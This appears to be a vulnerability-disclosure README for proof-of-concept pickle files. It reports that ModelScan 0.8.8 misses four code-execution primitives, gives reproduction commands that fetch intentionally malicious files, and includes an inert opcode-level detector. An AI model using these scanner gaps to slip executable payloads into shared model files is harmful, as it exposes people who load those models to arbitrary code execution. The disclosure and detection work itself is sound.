ModelScan v0.8.8 additional unsafe_globals primitives
Proof-of-concept files demonstrating that ModelScan's unsafe_globals allowlist omits four additional code-execution primitives beyond those already disclosed in issues #338, #331, and PR #339 on protectai/modelscan:
operator.methodcaller
functools.partial
atexit.register
threading.Thread
The bypass affects every extension that FormatViaExtensionMiddleware dispatches to PickleUnsafeOpScan: .pkl, .pickle, .joblib, .dill, .dat, .data. A .joblib variant (R2_A1-09_threading.joblib) is included as a concrete demonstration that the .joblib extension routes to the same scanner and yields the same total_issues: 0 result.
These files are intentionally malicious for demonstration purposes. Do not load any of them on a system you care about.
See the huntr submission for the detailed Description.
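As an added illustration of the gap (this is example code written for this page, not code from the PoC repository or from ModelScan), the following opcode-level check walks a pickle with pickletools.genops, which parses the stream without executing it, and reports any GLOBAL or STACK_GLOBAL reference to the four primitives listed above. The sample pickles it builds are constructed here and contain only a bare global reference with no REDUCE, so nothing is called even if one were loaded; all function and constant names are this example's own.

```python
import pickle
import pickletools

# The four primitives this page reports as absent from ModelScan 0.8.8's
# unsafe_globals list (names taken from the page, not from ModelScan's code).
MISSING_PRIMITIVES = {
    ("operator", "methodcaller"),
    ("functools", "partial"),
    ("atexit", "register"),
    ("threading", "Thread"),
}

# Opcodes that push a string; STACK_GLOBAL (protocol 4+) takes its
# module and name from the two most recently pushed ones.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def find_global_refs(data: bytes):
    """Every (module, name) the pickle imports via GLOBAL or STACK_GLOBAL.
    pickletools.genops only decodes opcodes, so nothing is executed."""
    refs, recent_strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":  # protocol <= 3: arg is "module name"
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            refs.append((recent_strings[-2], recent_strings[-1]))
        elif op.name in STRING_OPS:
            recent_strings.append(arg)
    return refs


def flagged_primitives(data: bytes):
    """Sorted subset of the pickle's imports that hit the four gaps above."""
    return sorted(set(find_global_refs(data)) & MISSING_PRIMITIVES)


def make_reference_pickle(module: str, name: str, stack_global: bool = False) -> bytes:
    """Constructed, inert sample: the whole payload is one global reference
    (no REDUCE, so nothing is called), in either encoding the detector must
    handle: GLOBAL (protocol 2) or STACK_GLOBAL (protocol 4)."""
    if not stack_global:
        return b"\x80\x02c" + module.encode() + b"\n" + name.encode() + b"\n."
    def short_unicode(s: str) -> bytes:  # SHORT_BINUNICODE: 0x8c, len, utf-8
        raw = s.encode("utf-8")
        return b"\x8c" + bytes([len(raw)]) + raw
    return b"\x80\x04" + short_unicode(module) + short_unicode(name) + b"\x93."


# Constructed benign comparison: plain data with no global references at all.
BENIGN_PICKLE = pickle.dumps({"weights": [0.1, 0.2, 0.3]})
```

The check is deliberately narrow (only these four names) and is a complement to a full scanner, not a replacement; a real allowlist or denylist would also need to cover the primitives already tracked in the issues cited above.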
Reproduction
python -m venv venv
# Windows: . venv/Scripts/activate
# POSIX: . venv/bin/activate
pip install modelscan==0.8.8
git clone https://huggingface.co/askeladd-k/modelscan-additional-primitives poc
cd poc
python repro.py
Expected output
R2_A1-02_methodcaller.pkl: total_issues=0 [BYPASSED (gap)]
R2_A1-05_partial.pkl: total_issues=0 [BYPASSED (gap)]
R2_A1-07_atexit.pkl: total_issues=0 [BYPASSED (gap)]
R2_A1-09_threading.pkl: total_issues=0 [BYPASSED (gap)]
R2_A1-09_threading.joblib: total_issues=0 [BYPASSED (gap, .joblib variant)]
positive_control.pkl: total_issues=1 [FLAGGED (positive control)]
AI disclosure
These proof-of-concept files were generated with AI-assisted analysis and manually verified in a clean environment against vanilla pip install modelscan==0.8.8.